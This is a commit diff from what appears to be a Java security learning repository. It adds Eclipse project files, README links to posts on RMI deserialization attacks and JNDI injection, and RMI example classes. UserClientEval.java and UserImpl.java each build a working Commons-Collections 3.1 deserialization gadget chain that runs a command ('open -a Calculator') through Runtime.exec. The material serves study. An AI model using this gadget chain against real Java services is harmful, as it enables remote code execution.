Threezh1
diff --git a/‎Commons_collection3_1/.classpath‎
Lines changed: 44 additions & 0 deletions b/‎Commons_collection3_1/.classpath‎
Lines changed: 44 additions & 0 deletions
diff --git a/‎Commons_collection3_1/.project‎
Lines changed: 34 additions & 0 deletions b/‎Commons_collection3_1/.project‎
Lines changed: 34 additions & 0 deletions
diff --git a/‎Commons_collection3_1/.settings/org.eclipse.jdt.apt.core.prefs‎
Lines changed: 2 additions & 0 deletions b/‎Commons_collection3_1/.settings/org.eclipse.jdt.apt.core.prefs‎
Lines changed: 2 additions & 0 deletions
diff --git a/‎Commons_collection3_1/.settings/org.eclipse.jdt.core.prefs‎
Lines changed: 9 additions & 0 deletions b/‎Commons_collection3_1/.settings/org.eclipse.jdt.core.prefs‎
Lines changed: 9 additions & 0 deletions
diff --git a/‎Commons_collection3_1/.settings/org.eclipse.m2e.core.prefs‎
Lines changed: 4 additions & 0 deletions b/‎Commons_collection3_1/.settings/org.eclipse.m2e.core.prefs‎
Lines changed: 4 additions & 0 deletions
diff --git a/‎README.md‎
Lines changed: 6 additions & 1 deletion b/‎README.md‎
Lines changed: 6 additions & 1 deletion
diff --git a/‎SimpleRMI_3/User.java‎
Lines changed: 11 additions & 0 deletions b/‎SimpleRMI_3/User.java‎
Lines changed: 11 additions & 0 deletions
diff --git a/‎SimpleRMI_3/UserClient.java‎
Lines changed: 14 additions & 0 deletions b/‎SimpleRMI_3/UserClient.java‎
Lines changed: 14 additions & 0 deletions
diff --git a/‎SimpleRMI_3/UserClientEval.java‎
Lines changed: 49 additions & 0 deletions b/‎SimpleRMI_3/UserClientEval.java‎
Lines changed: 49 additions & 0 deletions
diff --git a/‎SimpleRMI_3/UserImpl.java‎
Lines changed: 58 additions & 0 deletions b/‎SimpleRMI_3/UserImpl.java‎
Lines changed: 58 additions & 0 deletions
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<classpath>
+	<classpathentry kind="src" output="target/classes" path="src/main/java">
+		<attributes>
+			<attribute name="optional" value="true"/>
+			<attribute name="maven.pomderived" value="true"/>
+		</attributes>
+	</classpathentry>
+	<classpathentry kind="src" output="target/test-classes" path="src/test/java">
+		<attributes>
+			<attribute name="optional" value="true"/>
+			<attribute name="maven.pomderived" value="true"/>
+			<attribute name="test" value="true"/>
+		</attributes>
+	</classpathentry>
+	<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/J2SE-1.5">
+		<attributes>
+			<attribute name="maven.pomderived" value="true"/>
+		</attributes>
+	</classpathentry>
+	<classpathentry kind="con" path="org.eclipse.m2e.MAVEN2_CLASSPATH_CONTAINER">
+		<attributes>
+			<attribute name="maven.pomderived" value="true"/>
+		</attributes>
+	</classpathentry>
+	<classpathentry kind="src" path="target/generated-sources/annotations">
+		<attributes>
+			<attribute name="optional" value="true"/>
+			<attribute name="maven.pomderived" value="true"/>
+			<attribute name="ignore_optional_problems" value="true"/>
+			<attribute name="m2e-apt" value="true"/>
+		</attributes>
+	</classpathentry>
+	<classpathentry kind="src" output="target/test-classes" path="target/generated-test-sources/test-annotations">
+		<attributes>
+			<attribute name="optional" value="true"/>
+			<attribute name="maven.pomderived" value="true"/>
+			<attribute name="ignore_optional_problems" value="true"/>
+			<attribute name="m2e-apt" value="true"/>
+			<attribute name="test" value="true"/>
+		</attributes>
+	</classpathentry>
+	<classpathentry kind="output" path="target/classes"/>
+</classpath>
@@ -0,0 +1,34 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<projectDescription>
+	<name>Commons-collections3-1</name>
+	<comment></comment>
+	<projects>
+	</projects>
+	<buildSpec>
+		<buildCommand>
+			<name>org.eclipse.jdt.core.javabuilder</name>
+			<arguments>
+			</arguments>
+		</buildCommand>
+		<buildCommand>
+			<name>org.eclipse.m2e.core.maven2Builder</name>
+			<arguments>
+			</arguments>
+		</buildCommand>
+	</buildSpec>
+	<natures>
+		<nature>org.eclipse.jdt.core.javanature</nature>
+		<nature>org.eclipse.m2e.core.maven2Nature</nature>
+	</natures>
+	<filteredResources>
+		<filter>
+			<id>1608104623375</id>
+			<name></name>
+			<type>30</type>
+			<matcher>
+				<id>org.eclipse.core.resources.regexFilterMatcher</id>
+				<arguments>node_modules|.git|__CREATED_BY_JAVA_LANGUAGE_SERVER__</arguments>
+			</matcher>
+		</filter>
+	</filteredResources>
+</projectDescription>
@@ -0,0 +1,2 @@
+eclipse.preferences.version=1
+org.eclipse.jdt.apt.aptEnabled=false
@@ -0,0 +1,9 @@
+eclipse.preferences.version=1
+org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.5
+org.eclipse.jdt.core.compiler.compliance=1.5
+org.eclipse.jdt.core.compiler.problem.enablePreviewFeatures=disabled
+org.eclipse.jdt.core.compiler.problem.forbiddenReference=warning
+org.eclipse.jdt.core.compiler.problem.reportPreviewFeatures=ignore
+org.eclipse.jdt.core.compiler.processAnnotations=disabled
+org.eclipse.jdt.core.compiler.release=disabled
+org.eclipse.jdt.core.compiler.source=1.5
@@ -0,0 +1,4 @@
+activeProfiles=
+eclipse.preferences.version=1
+resolveWorkspaceProjects=true
+version=1
@@ -7,6 +7,8 @@ Stored notes and program examples summarized in the process of learning JAVA
 ## JAVA学习总结文章
 
 - [JAVA反序列化 & Commons-Collections-3.1 反序列化分析](https://threezh1.com/2020/12/10/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9F%BA%E7%A1%80_CommonCollection31%E5%88%86%E6%9E%90/)
+- [JAVA RMI 反序列化攻击 & JEP290 Bypass分析](https://threezh1.com/2020/12/19/JAVA_RMI_Learn/)
+- [JAVA JNDI注入基础与高版本限制绕过](https://threezh1.com/2021/01/02/JAVA_JNDI_Learn/)
 
 ## 代码库
 
@@ -16,4 +18,7 @@ Stored notes and program examples summarized in the process of learning JAVA
 - SimpleProxy 静态代理和动态代理
 - SimpleRMI_1 使用Naming的RMI
 - SimpleRMI_2 使用Registry的RMI
-- SimpleRMI_DiyStubAndSkeleton 自定义的Stub和Skeleton
+- SimpleRMI_3 RMI反序列化攻击所用的例子
+- SimpleRMI_DiyStubAndSkeleton 自定义的Stub和Skeleton
+- java_jep290 RMI攻击Bypass jep290限制
+- java_jndi 基础例子与JNDI注入
@@ -0,0 +1,11 @@
+package SimpleRMI_3;
+
+import java.rmi.Remote;
+import java.rmi.RemoteException;
+
+public interface User extends Remote{
+    String name(String name) throws RemoteException;
+    void say(String say) throws RemoteException;
+    void dowork(Object work) throws RemoteException;
+    Object getwork() throws RemoteException;
+}
@@ -0,0 +1,14 @@
+package SimpleRMI_3;
+
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+public class UserClient {
+    public static void main(String[] args) throws Exception{
+        Registry registry = LocateRegistry.getRegistry(3333); // 获取注册表
+        User userClient = (User) registry.lookup("HelloRegistry"); // 获取命名为HelloRegistr的远程对象的stub
+        System.out.println(userClient.name("test"));
+        userClient.say("world");
+        userClient.getwork();
+    }
+}
@@ -0,0 +1,49 @@
+package SimpleRMI_3;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.TransformedMap;
+
+import java.lang.annotation.Target;
+import java.lang.reflect.Constructor;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import java.util.HashMap;
+import java.util.Map;
+
+public class UserClientEval {
+    public static void main(String[] args) throws Exception{
+        Registry registry = LocateRegistry.getRegistry(3333);
+        User userClient = (User) registry.lookup("HelloRegistry");
+        System.out.println(userClient.name("test"));
+        userClient.say("world");// 这里会在server端输出
+        userClient.dowork(getpayload());
+    }
+
+    public static Object getpayload() {
+        try {
+            Transformer[] transformers = new Transformer[]{
+                    new ConstantTransformer(Runtime.class),
+                    new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
+                    new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
+                    new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open -a Calculator"})
+            };
+            Transformer transformerChain = new ChainedTransformer(transformers);
+
+            Map map = new HashMap();
+            map.put("value", "test");
+            Map transformedMap = TransformedMap.decorate(map, null, transformerChain);
+
+            Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
+            Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
+            ctor.setAccessible(true);
+            Object instance = ctor.newInstance(Target.class, transformedMap);
+            return instance;
+        }catch (Exception e){
+            e.printStackTrace();
+        }
+        return null;
+    }
+}
@@ -0,0 +1,58 @@
+package SimpleRMI_3;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.TransformedMap;
+
+import java.lang.reflect.Constructor;
+import java.rmi.RemoteException;
+import java.rmi.server.UnicastRemoteObject;
+import java.util.HashMap;
+import java.util.Map;
+
+public class UserImpl extends UnicastRemoteObject implements User {
+
+    public UserImpl() throws RemoteException{
+        super();
+    }
+    public String name(String name) throws RemoteException{
+        return name;
+    }
+    public void say(String say) throws  RemoteException{
+        System.out.println("you speak" + say);
+    }
+    public void dowork(Object work) throws  RemoteException{
+        System.out.println("your work is " + work);
+    }
+
+    public Object getwork() throws RemoteException {
+        Object evalObject = null;
+        try {
+            Transformer[] transformers = new Transformer[] {
+                    new ConstantTransformer(Runtime.class),
+                    new InvokerTransformer("getMethod",
+                            new Class[] {String.class, Class[].class},
+                            new Object[] {"getRuntime", new Class[0]}),
+                    new InvokerTransformer("invoke",
+                            new Class[] {Object.class, Object[].class},
+                            new Object[] {null, new Object[0] }),
+                    new InvokerTransformer("exec",
+                            new Class[] {String.class},
+                            new Object[] {"open -a Calculator"})
+            };
+            Transformer transformerChain = new ChainedTransformer(transformers);
+            Map innerMap = new HashMap();
+            innerMap.put("value", "Threezh1");
+            Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
+            Class AnnotationInvocationHandlerClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
+            Constructor cons = AnnotationInvocationHandlerClass.getDeclaredConstructor(Class.class, Map.class);
+            cons.setAccessible(true);
+            evalObject = cons.newInstance(java.lang.annotation.Retention.class, outerMap);
+        }catch (Exception e){
+            e.printStackTrace();
+        }
+        return evalObject;
+    }
+}
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,2 @@`
	`1`	`+eclipse.preferences.version=1`
	`2`	`+org.eclipse.jdt.apt.aptEnabled=false`